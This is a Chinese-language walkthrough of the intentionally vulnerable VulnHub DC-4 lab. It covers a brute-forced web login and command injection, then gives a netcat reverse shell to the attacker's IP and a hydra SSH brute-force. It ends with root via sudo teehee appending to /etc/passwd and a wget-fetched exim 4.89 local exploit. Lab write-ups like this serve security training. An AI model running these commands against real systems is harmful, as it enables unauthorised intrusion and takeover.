渗透测试 - DC-4 - 练习篇

admin
admin
admin
140350
文章
117
评论
2024年12月17日19:39:46评论13 views字数 2413阅读8分2秒阅读模式
渗透测试 - DC-4 - 练习篇  

描述

DC-4 是另一个专门建造的易受攻击实验室,旨在获得渗透测试领域的经验。

与以前的 DC 版本不同,此版本主要是为初学者/中级设计的。只有一个标志,但从技术上讲,有多个入口点,就像上次一样,没有线索。

必须具备 Linux 技能和熟悉 Linux 命令行,以及具备一些基本渗透测试工具的经验。

对于初学者,Google 可以提供很大的帮助,但您可以随时在 @DCAU7 上向我发送电子邮件以寻求帮助,让您重新开始。但请注意:我不会给你答案,相反,我会给你一个关于如何前进的想法。

官网下载地址:https://www.vulnhub.com/entry/dc-4,313/

下载完成之后解压用vm虚拟机打开镜像,打开之后把桥接改成NAT就可以了。然后开机开搞
渗透测试 - DC-4 - 练习篇
渗透测试 - DC-4 - 练习篇

这一台靶机没用提示,直接找到root用户下的flag文件就好了

解题思路

信息收集IP地址探测
nmap 192.168.40.0/24
渗透测试 - DC-4 - 练习篇
看到有5个IP,148是目标机的IP
攻击机:192.168.40.130
目标机:192.168.40.148
扫描一下目标机的开放端口服务
nmap -A -sV -T4 -p192.168.40.148
渗透测试 - DC-4 - 练习篇

两个开放端口22端口的ssh只能暴力破解,暂时不管先看看80端口web有没有漏洞,浏览器进去看一下

渗透测试 - DC-4 - 练习篇

看到是一个登录框,扫描一下目录试试

渗透测试 - DC-4 - 练习篇

目录也没什么东西,看来这个网站就一个登录页面,直接登录页面用字典爆破,打开burpsuite工具抓包,上一篇文章讲了burp抓包工具的用法,这里开始实验

渗透神器 - BurpSuite - 基础篇

启动

渗透测试 - DC-4 - 练习篇
代理抓包
渗透测试 - DC-4 - 练习篇

丢到攻击模块爆破

渗透测试 - DC-4 - 练习篇

导入密码字典

渗透测试 - DC-4 - 练习篇

开始爆破

渗透测试 - DC-4 - 练习篇

因为登录成功和登录失败的页面不一样所以他们的页面字节也是不一样的筛选不一样字节的可能就是登录成功的

渗透测试 - DC-4 - 练习篇

这里看到有两个,一个一个登录试试admin/root123 admin/happy

渗透测试 - DC-4 - 练习篇

两个都可以登录上去,我这里登录的是root123的,发现里面是执行一些命令

渗透测试 - DC-4 - 练习篇

试一下抓包能不能改里面的命令,抓包把ls+-l的命令改成id发现正常执行了还返回值了

渗透测试 - DC-4 - 练习篇
渗透测试 - DC-4 - 练习篇

这可以命令执行那就试一下能不能nc反弹shell,攻击机打开nc监听端口

nc -lvp 4444 ##后面的4444是我自己写的端口号,可自行修改
渗透测试 - DC-4 - 练习篇

通过抓包修改命令

nc+192.168.40.129+4444+-e+/bin/bash ##注意看上面包ls -l的参数是+号代替空格拼接的
渗透测试 - DC-4 - 练习篇

获取到命令行shell

渗透测试 - DC-4 - 练习篇

用python开启交互式shell

python -c "import pty;pty.spawn('/bin/bash')"
渗透测试 - DC-4 - 练习篇

正常解法(第一种解法)

查看用户

渗透测试 - DC-4 - 练习篇

看见有3个用户看一下里面的内容,root是看不了了,因为我们没有权限

渗透测试 - DC-4 - 练习篇

第一个用户里面有一个sh的执行文件去看看里面有什么东西

渗透测试 - DC-4 - 练习篇

一个重复执行的文件,没什么用再看另外两个文件,在backups文件夹里面看到一个密码本,mbox看不了没有权限,应该是要登录才能看

渗透测试 - DC-4 - 练习篇

应该是要我们爆破用户因为这个靶机是开了22端口的ssh服务的,把密码本里面的密码都复制下来,放到攻击机的文件里

渗透测试 - DC-4 - 练习篇

用hydra进行密码爆破

hydra -l jim -P passwd.txt192.168.40.148 ssh
渗透测试 - DC-4 - 练习篇

爆出来密码ssh登录一下

渗透测试 - DC-4 - 练习篇

查看一下上面我们看不了的那个文件,里面是一封邮件

渗透测试 - DC-4 - 练习篇

能接收邮件说明有邮件服务,看一下它的邮件目录

cd /var/spool/mail ##邮件目录基本上是固定的
渗透测试 - DC-4 - 练习篇

里面看到一个密码和写信人,登录写信人的用户试试   ^xHhA&hvim0y 

渗透测试 - DC-4 - 练习篇

准备提权sudo一下试试

渗透测试 - DC-4 - 练习篇

看见teehee命令可以使用root权限,可以用teehee提权

渗透测试 - DC-4 - 练习篇
echo"a::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
渗透测试 - DC-4 - 练习篇

提权成功拿到flag,这个是正常的解法,我在这个靶机找到了另一个方法,不需要后面那些复杂的找找找

第二种解法

通过nc反弹shell下载自动提权工具扫描一下,攻击机打开http服务

渗透测试 - DC-4 - 练习篇

目标机下载工具

wget 192.168.40.129:111/linpeas.sh
渗透测试 - DC-4 - 练习篇

提示目录权限不足,换到/tmp目录下载

/tmp 目录的默认权限设置在大多数Linux系统中,/tmp 目录是一个临时目录,默认情况下它具有较宽松的权限,通常是 1777,这意味着:所有用户都可以在 /tmp 目录中读、写和执行文件。1777 权限中的 "1" 表示“粘滞位”(Sticky Bit),这确保了只有文件的拥有者、root用户或文件所属组的成员可以删除或修改该文件。其他用户虽然能创建和编辑文件,但无法删除其他用户创建的文件。默认的 /tmp 目录权限为:drwxrwxrwt  10 root root 4096 Oct 10 14:30 /tmp这个权限设置是为了让不同的用户能够在系统中临时存储文件。然而,它也带来了潜在的安全风险,因为任何人都可以在该目录中创建文件,甚至可能利用一些漏洞上传恶意文件或脚本。
cd /tmp 进入目录wget 192.168.40.129:111/linpeas.sh 下载自动化工具chmod +x linpeas.sh  给工具权限./linpeas.sh 执行
渗透测试 - DC-4 - 练习篇

自动化工具告诉我可以用SUID提权

渗透测试 - DC-4 - 练习篇

这里看到exim4邮件传输代理,查看它的版本

exim4 --version
渗透测试 - DC-4 - 练习篇

4.89的版本,查看本地漏洞库有没有历史漏洞

searchsploit exim 4
渗透测试 - DC-4 - 练习篇

看到一条本地权限提升4.87-4.91的版本都可以用,我们的目标是4.89

渗透测试 - DC-4 - 练习篇

漏洞复现

把文件拷贝到当前目录下

searchsploit linux/local/46996.sh -m
渗透测试 - DC-4 - 练习篇

攻击机打开http服务

渗透测试 - DC-4 - 练习篇

目标机下载执行

wget 192.168.40.129:111/46996.sh  下载chmod +x 46996.sh 加权限./46996.sh 执行
渗透测试 - DC-4 - 练习篇

拿到root权限查看flag

渗透测试 - DC-4 - 练习篇

到这里就结束了,打靶机这种最重要的就是思路,打多了就熟悉了

原文始发于微信公众号(信安一把索):渗透测试 - DC-4 - 练习篇

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月17日19:39:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   渗透测试 - DC-4 - 练习篇https://cn-sec.com/archives/3520205.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息